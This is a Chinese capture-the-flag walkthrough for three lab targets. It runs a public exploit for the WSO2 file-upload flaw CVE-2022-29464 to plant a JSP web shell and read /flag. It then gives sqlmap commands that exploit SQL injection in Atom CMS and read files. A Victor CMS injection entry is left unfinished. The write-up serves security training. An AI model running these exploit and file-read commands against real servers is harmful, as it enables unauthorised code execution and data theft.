CVE-2022-29464

靶标介绍：

WSO2文件上传漏洞（CVE-2022-29464）是Orange Tsai发现的WSO2上的严重漏洞。该漏洞是一种未经身份验证的无限制任意文件上传，允许未经身份验证的攻击者通过上传恶意JSP文件在WSO2服务器上获得RCE。

Github下载EXP，地址：https://github.com/hakivvi/CVE-2022-29464/

执行命令：python exploit.py http://123.58.236.76:38380/ abc.jsp或者在pycharm上运行

根据返回信息可判断abc.jsp已成功上传。

浏览器直接访问返回路径，即可执行任意系统命令。

shell @ http://eci-2zefnfvpsa7cleo0wubm.cloudeci1.ichunqiu.com:9445//authenticationendpoint/abc.jsp

ls

cat /flag

CVE-2022-28060

靶标介绍：

Victor CMS v1.0 /includes/login.php 存在sql注入

在登录点抓包

将数据包 粘贴到1.txt

CVE-2022-25488

靶标介绍：

Atom CMS v2.0存在sql注入漏洞在/admin/ajax/avatar.php页面

进入之后发现是Not Found页面

访问/admin/ajax/avatar.php，发现是空白页面

查看源码

删除 avatar.php 文件发现能看到整个目录 

查看其他文件得到报错信息

测试一下注入点?id=1

源码发生了变化：

?id=1'

是字符型注入

使用 SQLMap

python sqlmap.py -u "http://eci-2zehclipdg0vl24ixud6.cloudeci1.ichunqiu.com/admin/ajax/avatar.php?id=1"

python sqlmap.py -u "http://eci-2zehclipdg0vl24ixud6.cloudeci1.ichunqiu.com/admin/ajax/avatar.php?id=1" -D "mysql" --file-read "/flag"